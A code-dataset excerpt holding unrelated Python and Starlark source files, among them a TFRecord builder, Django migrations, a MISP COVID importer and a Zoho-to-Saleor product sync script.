max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
djspace/bin/gm2m.py | carthagecollege/django-djspace | 0 | 12796751 | <reponame>carthagecollege/django-djspace
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import django
import os
import sys
django.setup()
# env
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djspace.settings.shell')
from django.contrib.auth.models import User
user = User.objects.get(pk=1217743)
print(user)
apps = user.profile.applications.all()
print(apps)
'''
if apps:
for a in apps:
#print a
print a.__dict__
#print a._state.__dict__
#print a.id
# don't work
#print a.all()
#print a.get_related_models()
'''
| 2.25 | 2 |
modules/parser/nodes/line_node.py | DavidMacDonald11/sea-to-c-transpiler-python-based | 0 | 12796752 | from modules.visitor.symbol_table import SymbolTable
from .ast_node import ASTNode
from .if_node import IfNode
class LineNode(ASTNode):
def __init__(self, expression, depth, no_end = False):
self.expression = expression
self.depth = depth
self.no_end = no_end
super().__init__(expression.position)
def __repr__(self):
return f"[{self.expression}]"
def interpret(self, interpreter):
return self.get_expression(interpreter)
def transpile(self, transpiler):
transpiler.depth = self.depth
expression = self.get_expression(transpiler)
indent = "\t" * self.depth
return f"{indent}{expression}{'' if self.no_end else ';'}\n"
def get_expression(self, visitor):
if isinstance(self.expression, IfNode):
visitor.symbol_table = SymbolTable(visitor.symbol_table)
expression = self.expression.visit(visitor)
visitor.symbol_table = visitor.symbol_table.parent
return expression
return self.expression.visit(visitor)
| 2.75 | 3 |
estruturais/flyweight/main.py | caio-bernardo/design-patterns-python | 363 | 12796753 | class KarakTea:
def __init__(self, tea_type):
self.__tea_type = tea_type
@property
def tea_type(self):
return self.__tea_type
class TeaMaker:
def __init__(self):
self.__available_tea = dict()
def make(self, preference):
if preference not in self.__available_tea:
self.__available_tea[preference] = KarakTea(preference)
return self.__available_tea[preference]
class TeaShop:
def __init__(self, tea_maker):
self.__orders = dict()
self.__tea_maker = tea_maker
def take_order(self, tea_type, table):
if table not in self.__orders:
self.__orders[table] = list()
self.__orders[table].append(self.__tea_maker.make(tea_type))
def serve(self):
for table, orders in self.__orders.items():
print('Serving tea to table {}'.format(table))
if __name__ == '__main__':
tea_maker = TeaMaker()
shop = TeaShop(tea_maker)
shop.take_order('red tea', 1)
shop.take_order('red tea more sugar', 2)
shop.take_order('red tea more milk', 3)
shop.serve()
| 3.453125 | 3 |
examples/covid19/import_csse_covid19_daily.py | cudeso/PyMISP | 0 | 12796754 | <filename>examples/covid19/import_csse_covid19_daily.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pathlib import Path
from csv import DictReader
from pymisp import MISPEvent, MISPOrganisation, PyMISP
from datetime import datetime
from dateutil.parser import parse
import json
from pymisp.tools import feed_meta_generator
from io import BytesIO
make_feed = False
path = Path('/home/raphael/gits/COVID-19/csse_covid_19_data/csse_covid_19_daily_reports/')
if make_feed:
org = MISPOrganisation()
org.name = 'CIRCL'
org.uuid = "55f6ea5e-2c60-40e5-964f-47a8950d210f"
else:
from covid_key import url, key
misp = PyMISP(url, key)
for p in path.glob('**/*.csv'):
d = datetime.strptime(p.name[:-4], '%m-%d-%Y').date()
event = MISPEvent()
event.info = f"[{d.isoformat()}] CSSE COVID-19 daily report"
event.date = d
event.distribution = 3
event.add_tag('tlp:white')
if make_feed:
event.orgc = org
else:
e = misp.search(eventinfo=event.info, metadata=True, pythonify=True)
if e:
# Already added.
continue
event.add_attribute('attachment', p.name, data=BytesIO(p.open('rb').read()))
event.add_attribute('link', f'https://github.com/CSSEGISandData/COVID-19/tree/master/csse_covid_19_data/csse_covid_19_daily_reports/{p.name}', comment='Source')
with p.open() as f:
reader = DictReader(f)
for row in reader:
obj = event.add_object(name='covid19-csse-daily-report', standalone=False)
if 'Province/State' in row:
if row['Province/State']:
obj.add_attribute('province-state', row['Province/State'])
elif '\ufeffProvince/State' in row:
if row['\ufeffProvince/State']:
obj.add_attribute('province-state', row['\ufeffProvince/State'])
else:
print(p, row.keys())
raise Exception()
obj.add_attribute('country-region', row['Country/Region'])
obj.add_attribute('update', parse(row['Last Update']))
if row['Confirmed']:
obj.add_attribute('confirmed', int(row['Confirmed']))
if row['Deaths']:
obj.add_attribute('death', int(row['Deaths']))
if row['Recovered']:
obj.add_attribute('recovered', int(row['Recovered']))
if make_feed:
with (Path('output') / f'{event.uuid}.json').open('w') as _w:
json.dump(event.to_feed(), _w)
else:
misp.add_event(event)
if make_feed:
feed_meta_generator(Path('output'))
| 2.203125 | 2 |
data_scripts/create_splits.py | Berndwl/TextMaps | 86 | 12796755 | <reponame>Berndwl/TextMaps
import os
import sys
from sklearn.cross_validation import KFold
RESULT_PATH = '../data_shops/page_sets/splits/'
PAGE_SETS_PATH = '../data_shops/page_sets/'
SHOP_LIST_PATH = '../data_shops/shop_list.txt'
def getPagesForShops(shops):
pages = []
for shop in shops:
page_set_path = os.path.join(PAGE_SETS_PATH,shop)
with open(page_set_path, 'r') as f:
shop_pages = [l.strip() for l in f.readlines()]
pages.extend(shop_pages)
return pages
def createListFile(filename, pages):
# for each page
lines = []
for page in pages:
line=page
lines.append(line)
with open(os.path.join(RESULT_PATH, filename),'w') as f:
for line in lines:
f.write(line+'\n')
#----- MAIN PART
if __name__ == "__main__":
# read shop list
with open(SHOP_LIST_PATH, 'r') as f:
shops = [l.strip() for l in f.readlines()]
kf = KFold(len(shops), n_folds=10)
split_num=1
for train_index, test_index in kf:
train_shops = [shops[i] for i in train_index]
test_shops = [shops[i] for i in test_index]
# get pages
train_pages = getPagesForShops(train_shops)
test_pages = getPagesForShops(test_shops)
createListFile('split_'+str(split_num)+'_train.txt',train_pages)
createListFile('split_'+str(split_num)+'_test.txt',test_pages)
split_num+=1
| 2.6875 | 3 |
xls/build_rules/xls_rules_build_defs.bzl | netskink/xls | 0 | 12796756 | <reponame>netskink/xls
# Copyright 2021 The XLS Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module contains build rules/macros for XLS.
This module contain all the XLS build rules/macros that require testing but are
not exposed to the user. This module is created for convenience.
"""
load(
"//xls/build_rules:xls_codegen_rules.bzl",
_xls_ir_verilog = "xls_ir_verilog",
)
load(
"//xls/build_rules:xls_jit_wrapper_rules.bzl",
_xls_ir_jit_wrapper = "xls_ir_jit_wrapper",
_xls_ir_jit_wrapper_macro = "xls_ir_jit_wrapper_macro",
)
load(
"//xls/build_rules:xls_ir_rules.bzl",
_xls_dslx_ir = "xls_dslx_ir",
_xls_ir_opt_ir = "xls_ir_opt_ir",
)
load(
"//xls/build_rules:xls_rules.bzl",
_xls_dslx_opt_ir = "xls_dslx_opt_ir",
_xls_dslx_verilog = "xls_dslx_verilog",
)
xls_dslx_ir = _xls_dslx_ir
xls_dslx_opt_ir = _xls_dslx_opt_ir
xls_dslx_verilog = _xls_dslx_verilog
xls_ir_opt_ir = _xls_ir_opt_ir
xls_ir_verilog = _xls_ir_verilog
xls_ir_jit_wrapper = _xls_ir_jit_wrapper
xls_ir_jit_wrapper_macro = _xls_ir_jit_wrapper_macro
| 1.382813 | 1 |
py/tests/test_nil.py | JakeMakesStuff/erlpack | 108 | 12796757 | from __future__ import absolute_import
from erlpack import pack
def test_nil():
assert pack(None) == b'\x83s\x03nil'
| 1.445313 | 1 |
operative/test/report_test.py | buzzfeed/python-operative | 0 | 12796758 | import unittest
import operative
import datetime
from caliendo.patch import patch
from caliendo import expected_value
from nose.tools import eq_, ok_
from operative.settings import TEST_FTP_LOGIN
class ReportTest(unittest.TestCase):
"""
Test the various reports.
"""
@patch('operative.FTPConnection.get_files')
@patch('operative.FTPConnection._establish_connection')
@patch('operative.FTPConnection._close_connection')
def test_line_item_report(self):
"""
Test LineItemReport
"""
from operative.reports.line_item_report import LineItemReport
def __get_and_test(path, since):
ftp_creds = operative.FTPCredentials(**TEST_FTP_LOGIN)
line_item_reports = LineItemReport().get_report_files(ftp_credentials=ftp_creds, ftp_path=path, since=since)
for lir in line_item_reports:
observed_value = str(lir.data[0])
eq_(expected_value.get_or_store(observed_value), observed_value)
# get all files
__get_and_test(path='/flatfile', since=None)
# get one file - using "since"
__get_and_test(path='/flatfile', since=datetime.datetime(2014, 1, 7, 0, 42))
# get zero files - using "since"
__get_and_test(path='/flatfile', since=datetime.datetime(2014, 2, 1))
# get zero files - only directories in path
__get_and_test(path='/', since=None)
| 2.125 | 2 |
pys/006_get_table_columns.py | indecipherable/linuxtest_dust | 0 | 12796759 | <reponame>indecipherable/linuxtest_dust
# works as intended
import mysql.connector
from mysql.connector import errorcode
import sys
import re
import os
from pprint import pprint as p
# trying to import where_am_i as module
#import importlib
#where_am_i="/000_where_am_i"
#sys.path.append(os.getcwd())
#import 000_where_am_i
#pm = __import__(where_am_i)
#find_where_am_i()
import mysql.connector
from mysql.connector import errorcode
line_count = 0
# defines strip_end for project_dir
def strip_end(text, suffix):
if not text.endswith(suffix):
return text
return text[:len(text)-len(suffix)]
# enumerate where our project directories are
#print("DEBUG: sys.path is: %r" % sys.path)
py_wd=os.getcwd()
#print("DEBUG: thiscwd is: %r" % py_wd)
project_dir=strip_end(py_wd, "/pys")
#print("DEBUG: stripcwd is: %r" % project_dir)
q_dir=project_dir+"/questions"
#print("DEBUG: q_dir is: %r" % q_dir)
def get_table_columns():
try:
cnx = mysql.connector.connect(user='root', password='<PASSWORD>',
host='127.0.0.1', database='linuxquiztest')
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exist")
else:
print(err)
else:
cursor = cnx.cursor()
cursor.execute("DESCRIBE questions;")
my_columns = cursor.fetchall()
cursor.close()
for (a_column) in my_columns:
# line_count = line_count + 1
print(a_column)
# print("DEBUG: line_count is: %s" % line_count)
return my_columns
get_table_columns()
#print(my_columns)
| 2.390625 | 2 |
datasets/create_tf_record.py | ace19-dev/image-retrieval-tf | 6 | 12796760 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hashlib
import io
import os
import random
from PIL import Image, ImageStat
import tensorflow as tf
from datasets import dataset_utils
flags = tf.app.flags
flags.DEFINE_string('dataset_dir',
'/home/ace19/dl_data/materials',
'Root Directory to dataset.')
flags.DEFINE_string('output_path',
'/home/ace19/dl_data/materials/query.record',
'Path to output TFRecord')
flags.DEFINE_string('dataset_category',
'query',
'dataset category, train|validation|test')
FLAGS = flags.FLAGS
def get_label_map(label_to_index):
label_map = {}
# cls_lst = os.listdir(FLAGS.dataset_dir)
cls_path = os.path.join(FLAGS.dataset_dir, FLAGS.dataset_category)
cls_lst = os.listdir(cls_path)
for i, cls in enumerate(cls_lst):
data_path = os.path.join(cls_path, cls)
img_lst = os.listdir(data_path)
for n, img in enumerate(img_lst):
img_path = os.path.join(data_path, img)
label_map[img_path] = label_to_index[cls]
return label_map
def dict_to_tf_example(image_name,
dataset_directory,
label_map=None,
image_subdirectory='train'):
"""
Args:
image: a single image name
dataset_directory: Path to root directory holding PCam dataset
label_map: A map from string label names to integers ids.
image_subdirectory: String specifying subdirectory within the
PCam dataset directory holding the actual image data.
Returns:
example: The converted tf.Example.
Raises:
ValueError: if the image pointed to by image is not a valid PNG
"""
# full_path = os.path.join(dataset_directory, image_subdirectory, image_name)
full_path = os.path.join(dataset_directory, image_name)
with tf.io.gfile.GFile(full_path, 'rb') as fid:
encoded = fid.read()
encoded_io = io.BytesIO(encoded)
image = Image.open(encoded_io)
width, height = image.size
format = image.format
image_stat = ImageStat.Stat(image)
mean = image_stat.mean
std = image_stat.stddev
key = hashlib.sha256(encoded).hexdigest()
# if image_subdirectory.lower() == 'test':
# label = -1
# else:
# label = int(label_map[image_name])
label = int(label_map[full_path])
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': dataset_utils.int64_feature(height),
'image/width': dataset_utils.int64_feature(width),
'image/filename': dataset_utils.bytes_feature(image_name.encode('utf8')),
'image/fullpath': dataset_utils.bytes_feature(full_path.encode('utf8')),
'image/source_id': dataset_utils.bytes_feature(image_name.encode('utf8')),
'image/key/sha256': dataset_utils.bytes_feature(key.encode('utf8')),
'image/encoded': dataset_utils.bytes_feature(encoded),
'image/format': dataset_utils.bytes_feature(format.encode('utf8')),
'image/class/label': dataset_utils.int64_feature(label),
# 'image/text': dataset_util.bytes_feature('label_text'.encode('utf8'))
'image/mean': dataset_utils.float_list_feature(mean),
'image/std': dataset_utils.float_list_feature(std)
}))
return example
def main(_):
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)
options = tf.io.TFRecordOptions(tf.io.TFRecordCompressionType.GZIP)
writer = tf.io.TFRecordWriter(FLAGS.output_path, options=options)
# cls_lst = os.listdir(FLAGS.dataset_dir)
dataset_lst = os.path.join(FLAGS.dataset_dir, FLAGS.dataset_category)
cls_lst = os.listdir(dataset_lst)
cls_lst.sort()
label_to_index = {}
for i, cls in enumerate(cls_lst):
cls_path = os.path.join(dataset_lst, cls)
if os.path.isdir(cls_path):
label_to_index[cls] = i
label_map = get_label_map(label_to_index)
random.shuffle(cls_lst)
for i, cls in enumerate(cls_lst):
cls_path = os.path.join(dataset_lst, cls)
img_lst = os.listdir(cls_path)
total = len(img_lst)
for idx, image in enumerate(img_lst):
if idx % 100 == 0:
tf.compat.v1.logging.info('On image %d of %d', idx, total)
tf_example = dict_to_tf_example(image, cls_path, label_map, FLAGS.dataset_category)
writer.write(tf_example.SerializeToString())
writer.close()
if __name__ == '__main__':
tf.compat.v1.app.run()
| 2.25 | 2 |
examples/settings.py | seankmartin/brainrender | 0 | 12796761 | <filename>examples/settings.py
"""
Brainrender provides several default settins (e.g. for shader style)
which can be changed to personalize your rendering.
This example shows you how
"""
import brainrender
from brainrender import Scene
from rich import print
from myterial import orange
from pathlib import Path
print(f"[{orange}]Running example: {Path(__file__).name}")
brainrender.settings.BACKGROUND_COLOR = [
0.22,
0.22,
0.22,
] # change rendering background color
brainrender.settings.WHOLE_SCREEN = (
False # make the rendering window be smaller
)
brainrender.settings.SHOW_AXES = (
False # turn off the axes display
)
# make scenes with different shader styles
for shader in ("plastic", "cartoon"):
brainrender.settings.SHADER_STYLE = shader
scene = Scene(title=shader)
scene.render()
| 2.859375 | 3 |
parser/team02/proyec_v2/ast/Expresion.py | webdev188/tytus | 35 | 12796762 | class Expresion:
def getValor(self,entorno,tree):
pass
| 1.398438 | 1 |
arike/visits/migrations/0005_auto_20220304_2228.py | iamsdas/arike | 0 | 12796763 | <filename>arike/visits/migrations/0005_auto_20220304_2228.py
# Generated by Django 3.2.12 on 2022-03-04 16:58
import datetime
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('patients', '0014_auto_20220304_2228'),
('visits', '0004_auto_20220304_2225'),
]
operations = [
migrations.AlterField(
model_name='treatmentnote',
name='created_at',
field=models.DateTimeField(default=datetime.datetime(2022, 3, 4, 16, 58, 46, 500162, tzinfo=utc)),
),
migrations.AlterField(
model_name='treatmentnote',
name='treatment',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='patients.treatment'),
),
migrations.AlterField(
model_name='visitdetails',
name='created_at',
field=models.DateTimeField(default=datetime.datetime(2022, 3, 4, 16, 58, 46, 499184, tzinfo=utc)),
),
migrations.AlterField(
model_name='visitschedule',
name='created_at',
field=models.DateTimeField(default=datetime.datetime(2022, 3, 4, 16, 58, 46, 498165, tzinfo=utc)),
),
]
| 1.476563 | 1 |
app/routers/weather/models.py | neurothrone/weather-api | 0 | 12796764 | from pydantic import BaseModel, Field
from app.shared.enums import Units
class LocationBase(BaseModel):
units: Units = Units.METRIC
class CityLocation(BaseModel):
city: str
state: str | None = Field(default=None, max_length=3)
country: str | None = None
class Config:
schema_extra = {
"example": {
"city": "gothenburg"
}
}
class CoordsLocation(LocationBase):
lat: float
lon: float
class Config:
schema_extra = {
"example": {
"lat": "50",
"lon": "30"
}
}
class WeatherOut(BaseModel):
temperature: str
units: Units
city: str | None = None
country: str | None = None
weather: str | None = None
lat: float | None = None
lon: float | None = None
| 2.796875 | 3 |
scripts/planet-caravan/zoho-sync.py | labogdan/planet-caravan-backend | 0 | 12796765 | import os
import sys
import json
import mimetypes
import urllib
import requests
import django
sys.path.append(os.path.abspath('.'))
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "saleor.settings")
try:
django.setup()
except:
pass
from django.core.cache import cache
from dotenv import load_dotenv
from Lib.CLI import *
from Lib.helpers import handleize, description_block
from Lib.Saleor.Product import Product
from Lib.Saleor.Variant import Variant
from Lib.Saleor.ProductType import ProductType
from Lib.Saleor.ProductAttribute import ProductAttribute
from Lib.Saleor.ProductAttributeValue import ProductAttributeValue
from Lib.Saleor.Category import Category
from Lib.Saleor.ProductCollection import ProductCollection
import psycopg2
from psycopg2.extras import DictCursor
from pprint import pprint
import boto3
import pickle
from datetime import datetime, timedelta
from Lib.Email import send_email
oauth_token = None
# Global variable
cursor = None
db = None
environment = 'local'
def db_connect(env='production'):
info("Connecting to DB")
global db
global environment
environment = env
try:
if environment == 'local':
# Local dev
db_name = os.getenv('DB_NAME')
db_user = os.getenv('DB_USER')
db_host = os.getenv('DB_HOST')
db_pass = os.getenv('DB_PASS')
db = psycopg2.connect(
f"dbname='{db_name}' user='{db_user}' host='{db_host}' password='{db_<PASSWORD>}'")
else:
# Heroku Production
db_host = os.environ['DATABASE_URL']
db = psycopg2.connect(db_host, sslmode='require')
db.autocommit = True
return db
except Exception as e:
error("Unable to connect to database.")
error(e)
return False
def get_oauth():
global oauth_token
oauth_url = 'https://accounts.zoho.com/oauth/v2/token'
params = {
'client_id': os.getenv('ZOHO_CLIENT_ID'),
'client_secret': os.getenv('ZOHO_CLIENT_SECRET'),
'refresh_token': os.getenv('ZOHO_REFRESH_TOKEN'),
'grant_type': 'refresh_token'
}
response = requests.post(url=oauth_url, params=params)
if response is not None:
oauth_token = response.json()['access_token']
return True
return False
def handle_raw_product(raw_product: dict = None, config: dict = None):
global cursor
if not config:
config = {
'force_images': False
}
print('======================================')
warning(f'handle_raw_product(): {raw_product["Product_Name"]}')
# Product
product = Product()
product.name = raw_product['Product_Name'].split('|')[0].strip()
product.slug = handleize(raw_product['Product_Name'])
product.description = str(raw_product['Description'])
product.description_json = description_block(raw_product['Description'])
metadata = {}
for mk, pk in {
'DROP_DATE': 'Drop_Date_Time',
'COMING_SOON': 'Coming_Soon',
'CROSS_SELL': 'Cross_Sell',
'CROSS_SELL_URL': 'Cross_Sell_URL',
'PELICAN_SIZE': 'Suggested_Pelican_Size'
}.items():
if pk in raw_product and raw_product[pk] is not None:
metadata[mk] = str(raw_product[pk])
product.metadata = json.dumps(metadata)
product.private_metadata = json.dumps({
'ZOHO_ID': raw_product['id']
})
# Variant
variant = Variant()
variant.name = str(raw_product['Product_Name'])
variant.sku = str(raw_product['SKU']).strip("'")
if not variant.sku:
error("No SKU, skipping.")
return False
variant.cost_price_amount = raw_product['Cost']
variant.weight = 0
variant.price_amount = raw_product['Unit_Price']
product.variants.append(variant)
# Product type
pt = ProductType()
pt.type = raw_product['Category']
pt.slug = handleize(raw_product['Category'])
# Category
if 'Department' not in raw_product.keys() or raw_product['Department'] is None:
error(f'Product {product.name} has no Department')
return
parent_category = Category(raw_product['Department'])
if 'Category' not in raw_product.keys() or raw_product['Category'] is None:
error(f'Product {product.name} has no Category')
return
child_category = Category(raw_product['Category'])
child_category.level = 1
parent_category.children.append(child_category)
product.category = parent_category
# Attributes
for i in range(1, 7):
name_key = f'Attribute_Name_{i}'
value_key = f'Attribute_Value_{i}'
if (name_key in raw_product.keys() and value_key in raw_product.keys()
and raw_product[name_key] and raw_product[value_key]):
product_attribute = ProductAttribute(raw_product[name_key],
[ProductAttributeValue(
raw_product[value_key])])
pt.add_attribute(product_attribute)
product.type = pt
# Collections
if 'Collection' in raw_product.keys() and type(raw_product['Collection']) is str:
for collection_name in raw_product['Collection'].split(','):
collection_name = collection_name.strip()
collection = ProductCollection()
collection.name = collection_name
collection.slug = handleize(collection_name)
product.collections.append(collection)
create_or_update_data(product)
# Images
handle_images(product, raw_product, config['force_images'])
def create_or_update_data(product: Product = None):
global cursor
info(f'create_or_update_data(): {product.name} | {product.variants[0].sku}')
product.type = handle_product_type(product.type)
comment(f'Product type ID: {product.type.id}')
product.category = handle_product_category(product.category)
comment(f'Product category ID: {product.category.children[0].id}')
product.collections = handle_product_collection(product.collections)
# Create the product, matched by SKU
cursor.execute("""
SELECT p.id
FROM product_productvariant pv
LEFT JOIN product_product p ON pv.product_id = p.id
WHERE pv.sku = %s
""", (product.variants[0].sku,))
product_result = cursor.fetchone()
if product_result:
product.id = product_result[0]
cursor.execute("""
UPDATE product_product
SET id = product_product.id, name = %s,
description = %s, description_json = %s, product_type_id = %s,
category_id = %s, metadata = %s, private_metadata = %s, updated_at = NOW(),
is_published = %s, publication_date = NOW()
WHERE id = %s
""",
(
# UPDATE clause
product.name, product.description, product.description_json,
product.type.id, product.category.children[0].id,
product.metadata, product.private_metadata,
product.is_published,
product.id
))
else:
cursor.execute("""
INSERT INTO product_product
(name, description, description_json, product_type_id, category_id,
is_published, charge_taxes, currency, slug, visible_in_listings, metadata,
private_metadata, in_stock, publication_date, updated_at, available_for_purchase)
VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, NOW(), NOW(), NOW())
ON CONFLICT (slug) DO UPDATE
SET id = product_product.id, name = %s,
description = %s, description_json = %s, product_type_id = %s,
category_id = %s, metadata = %s, private_metadata = %s,
is_published = %s, publication_date = NOW(),
updated_at = NOW()
RETURNING id
""",
(
# INSERT clause
product.name, product.description, product.description_json,
product.type.id, product.category.children[0].id,
product.is_published, product.charge_taxes,
product.currency, product.slug, product.visible_in_listings,
product.metadata, product.private_metadata, False,
# UPDATE clause
product.name, product.description, product.description_json,
product.type.id, product.category.children[0].id,
product.metadata, product.private_metadata,
product.is_published
))
product.id = cursor.fetchone()[0]
info(f'Product ID: {product.id}')
# Add Attributes
for i, attribute in enumerate(product.type.attributes):
cursor.execute("""
INSERT INTO product_assignedproductattribute(product_id, assignment_id)
VALUES(%s, %s)
ON CONFLICT (product_id, assignment_id) DO UPDATE
SET id = product_assignedproductattribute.id
RETURNING id
""",
(product.id, attribute.assignment_id))
apa_id = cursor.fetchone()[0]
# Clear out prior attribute
cursor.execute("""
DELETE FROM product_assignedproductattribute_values
WHERE assignedproductattribute_id = %s
""", (apa_id,))
# Create the new value
cursor.execute("""
INSERT INTO product_assignedproductattribute_values
(assignedproductattribute_id, attributevalue_id)
VALUES(%s, %s)
ON CONFLICT (assignedproductattribute_id, attributevalue_id)
DO NOTHING
""",
(apa_id, attribute.values[0].id))
# Add Variant
variant = product.variants[0]
cursor.execute("""
INSERT INTO product_productvariant
(sku, name, product_id, cost_price_amount, weight, metadata, private_metadata,
currency, price_amount, track_inventory)
VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, TRUE)
ON CONFLICT (sku) DO UPDATE
SET id = product_productvariant.id
RETURNING id
""", (variant.sku, variant.name, product.id,
variant.cost_price_amount, variant.weight,
variant.metadata, variant.private_metadata,
variant.currency, variant.price_amount))
variant.id = cursor.fetchone()[0]
info(f'Variant ID: {variant.id}')
try:
cursor.execute("""
UPDATE product_product
SET default_variant_id = %s
WHERE id = %s
""", (variant.id, product.id))
except:
pass
# Add To Collections
collections_to_keep = ()
if len(product.collections):
for collection in product.collections:
collections_to_keep = (*collections_to_keep, collection.id)
warning(f'Adding to collection: {product.id} in {collection.id}')
cursor.execute("""
INSERT INTO product_collectionproduct(collection_id, product_id)
VALUES(%s, %s)
ON CONFLICT (collection_id, product_id)
DO NOTHING
""", (collection.id, product.id))
if len(collections_to_keep):
# Remove from any other collections
cursor.execute("""
DELETE FROM product_collectionproduct
WHERE product_id = %s AND collection_id NOT IN %s
""", (product.id, collections_to_keep))
else:
# Just remove from all
cursor.execute("""
DELETE FROM product_collectionproduct
WHERE product_id = %s
""", (product.id,))
# Add Warehouse entry
cursor.execute("""
SELECT id
FROM warehouse_warehouse
LIMIT 1""")
warehouse_id = cursor.fetchone()[0]
info(f'Creating warehouse entry: {warehouse_id}')
cursor.execute("""
INSERT INTO warehouse_stock (product_variant_id, quantity, warehouse_id)
VALUES(%s, %s, %s)
ON CONFLICT(product_variant_id, warehouse_id) DO NOTHING
""", (product.variants[0].id, 0, warehouse_id))
return True
def handle_images(product: Product, raw_product: dict = None,
force_images: bool = False) -> None:
global oauth_token
global cursor
global environment
raw_images = []
for i in range(10):
k = f'Product_Photo{i}'
if k in raw_product.keys() and raw_product[k] and len(raw_product[k]) > 0:
raw_images.append(raw_product[k][0])
s3 = None
AWS_MEDIA_BUCKET_NAME = os.environ.get("AWS_MEDIA_BUCKET_NAME")
AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
zoho_id = json.loads(product.private_metadata)['ZOHO_ID']
url = f'https://www.zohoapis.com/crm/v2/Products/{zoho_id}/Attachments'
headers = {
'Authorization': f'Zoho-oauthtoken {oauth_token}',
}
all_filenames = ()
for i, image in enumerate(raw_images):
attachment_id = image['attachment_Id']
filename = image['file_Name']
all_filenames = (*all_filenames, f"products/{filename}")
try:
# Check if filename exists already
cursor.execute("""
SELECT COUNT(*) AS count
FROM product_productimage
WHERE product_id = %s and image = %s
""", (product.id, f"products/{filename}"))
existing_image = cursor.fetchone()[0]
# Upload if new or forced
if (not existing_image and environment != 'local') or force_images is True:
warning(f'Uploading Image: {filename}')
session = boto3.Session(
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
)
s3 = session.resource('s3')
mtype = mimetypes.MimeTypes().guess_type(filename)[0]
img_url = f'{url}/{attachment_id}'
info(img_url)
req = urllib.request.Request(img_url, headers=headers)
response = urllib.request.urlopen(req)
img_bytes = response.read()
s3.Bucket(AWS_MEDIA_BUCKET_NAME).put_object(
Body=img_bytes,
Key=f'products/{filename}',
ContentType=mtype)
# Insert or update db
if not existing_image:
cursor.execute("""
INSERT INTO product_productimage(sort_order, product_id, image, ppoi, alt)
VALUES(%s, %s, %s, %s, %s)
""", (i, product.id, f"products/{filename}", '0.5x0.5', ''))
else:
cursor.execute("""
UPDATE product_productimage
SET sort_order = %s
WHERE product_id = %s and image = %s
""", (i, product.id, f"products/{filename}"))
warning(f'Existing Image: {filename}')
except:
pass
# Clear out unused photos
try:
if len(all_filenames):
warning("Keep files:")
warning(all_filenames)
cursor.execute("""
DELETE FROM product_productimage
WHERE product_id = %s AND image NOT IN %s
""", (product.id, all_filenames))
else:
cursor.execute("""
DELETE FROM product_productimage
WHERE product_id = %s
""", (product.id,))
except:
error('Error clearing out unused images.')
pass
def handle_product_type(pt: ProductType = None) -> int:
global cursor
warning('PRODUCT TYPE')
# The ProductType itself
cursor.execute("""
INSERT INTO product_producttype (name, has_variants, is_shipping_required, weight,
is_digital, slug, metadata, private_metadata)
VALUES(%s, %s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (slug) DO UPDATE
SET id = product_producttype.id, name = %s
RETURNING id
""", (
# INSERT clause
pt.type, False, True, 0, False, pt.slug, '{}', '{}',
# UPDATE clause
pt.type))
pt.id = cursor.fetchone()[0]
# Attributes
for i, attribute in enumerate(pt.attributes):
cursor.execute("""
INSERT INTO product_attribute (name, slug, input_type,
available_in_grid, visible_in_storefront, filterable_in_dashboard,
filterable_in_storefront, value_required, storefront_search_position,
is_variant_only, metadata, private_metadata)
VALUES(%s, %s, %s, TRUE, TRUE, TRUE, TRUE, TRUE, 0, FALSE, '{}', '{}')
ON CONFLICT (slug) DO UPDATE
SET id = product_attribute.id, name = %s
RETURNING id
""", (
# INSERT clause
attribute.type, attribute.slug, 'dropdown',
# UPDATE clause
attribute.type
))
pt.attributes[i].id = cursor.fetchone()[0]
comment(f'Attribute {attribute.type}({i}) : {pt.attributes[i].id}')
cursor.execute("""
INSERT INTO product_attributeproduct(attribute_id, product_type_id)
VALUES(%s, %s)
ON CONFLICT (attribute_id, product_type_id) DO UPDATE
SET id = product_attributeproduct.id
RETURNING ID
""", (attribute.id, pt.id))
pt.attributes[i].assignment_id = cursor.fetchone()[0]
comment(f' Assignment ID: {pt.attributes[i].assignment_id}')
# Attribute Values
for j, value in enumerate(attribute.values):
cursor.execute("""
INSERT INTO product_attributevalue(name, slug, value, attribute_id)
VALUES(%s, %s, %s, %s)
ON CONFLICT (attribute_id, slug) DO UPDATE
SET id = product_attributevalue.id, name = %s, value = %s
RETURNING id
""", (
# INSERT clause
value.value, value.slug, value.slug, pt.attributes[i].id,
# UPDATE clause
value.value, value.slug
))
pt.attributes[i].values[j].id = cursor.fetchone()[0]
comment(f' Value {value.value} : {pt.attributes[i].values[j].id}')
return pt
def handle_product_category(cat: Category = None) -> Category:
global cursor
warning('CATEGORIES')
cursor.execute("""
INSERT INTO product_category
(name, slug, level, description, lft, rght, tree_id,
background_image, background_image_alt, description_json, parent_id,
metadata, private_metadata)
VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (slug) DO UPDATE
